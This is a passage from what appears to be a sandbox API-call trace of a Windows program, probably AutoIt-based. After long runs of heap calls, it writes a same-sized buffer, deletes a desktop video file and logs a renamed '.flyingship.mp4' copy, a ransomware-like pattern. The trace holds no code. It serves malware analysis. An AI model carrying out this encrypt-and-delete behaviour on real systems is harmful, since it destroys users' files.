hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0167.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0167.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0167.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0167.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0167.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0167.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0167.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0167.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0167.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0167.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0167.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0167.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0167.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0167.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0167.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0167.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0167.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0167.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0167.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0167.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0167.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0167.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0167.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0167.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0167.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0167.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0167.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0167.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0167.964] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0167.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0167.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0167.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0167.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0167.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0167.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0167.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0167.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0167.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0167.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0167.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0167.964] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0167.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0167.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0167.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0167.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0167.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0167.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0167.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0167.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0167.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0167.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0167.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0167.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0167.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0167.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0167.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0167.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0167.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0167.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0167.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0167.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0167.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0167.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0167.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0167.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0167.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0167.966] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0167.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0167.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd5b8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0167.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.966] GetProcAddress (hModule=0x75990000, lpProcName="WriteFile") returned 0x759a1282 [0167.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0167.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0167.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0167.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0167.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0167.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0167.966] WriteFile (in: hFile=0x120, lpBuffer=0x9c5180*, nNumberOfBytesToWrite=0x1828a, lpNumberOfBytesWritten=0x87eae0, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesWritten=0x87eae0*=0x1828a, lpOverlapped=0x0) returned 1 [0167.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0167.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0167.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0167.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0167.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0167.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0167.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0167.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0167.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0167.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0167.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0167.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0167.967] FreeLibrary (hLibModule=0x75990000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0167.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0167.968] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.968] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.968] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.968] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.968] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0167.968] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.969] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0167.969] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0167.971] FreeLibrary (hLibModule=0x75990000) returned 1 [0167.971] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.971] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0167.971] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.971] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4", lpFilePart=0x0) returned 0x3b [0167.972] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebdc050, ftCreationTime.dwHighDateTime=0x1d5e739, ftLastAccessTime.dwLowDateTime=0xfe74e650, ftLastAccessTime.dwHighDateTime=0x1d5dcab, ftLastWriteTime.dwLowDateTime=0x9789be0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1828a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="urMVeYqgrC9wPF_WA.mp4", cAlternateFileName="URMVEY~1.MP4")) returned 0x90af58 [0167.973] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\urmveyqgrc9wpf_wa.mp4")) returned 1 [0167.977] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ebdc050, ftCreationTime.dwHighDateTime=0x1d5e739, ftLastAccessTime.dwLowDateTime=0xfe74e650, ftLastAccessTime.dwHighDateTime=0x1d5dcab, ftLastWriteTime.dwLowDateTime=0x9789be0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x1828a, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="urMVeYqgrC9wPF_WA.mp4", cAlternateFileName="URMVEY~1.MP4")) returned 0 [0167.977] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0167.978] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0167.978] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0167.978] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0167.979] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0167.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0167.979] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0167.979] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0167.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0167.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0167.979] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0167.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0167.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0167.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0167.979] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0167.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0167.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0167.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0167.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0167.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0167.979] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0167.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0167.979] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0167.979] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0167.981] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.981] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0167.981] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.981] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0167.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0167.981] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9d5188 [0167.982] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0167.982] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0167.982] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0xbb0, lpOverlapped=0x0) returned 1 [0167.982] ReadFile (in: hFile=0x120, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0167.983] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0xbb0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0167.983] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0167.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0167.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d5188 | out: hHeap=0x8a0000) returned 1 [0167.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0167.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0167.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.flyingship.mp4\r\n", cchWideChar=73, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 73 [0167.983] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x49) returned 0x923ad0 [0167.983] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.flyingship.mp4\r\n", cchWideChar=73, lpMultiByteStr=0x923ad0, cbMultiByte=73, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\urMVeYqgrC9wPF_WA.flyingship.mp4\r\n", lpUsedDefaultChar=0x0) returned 73 [0167.983] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 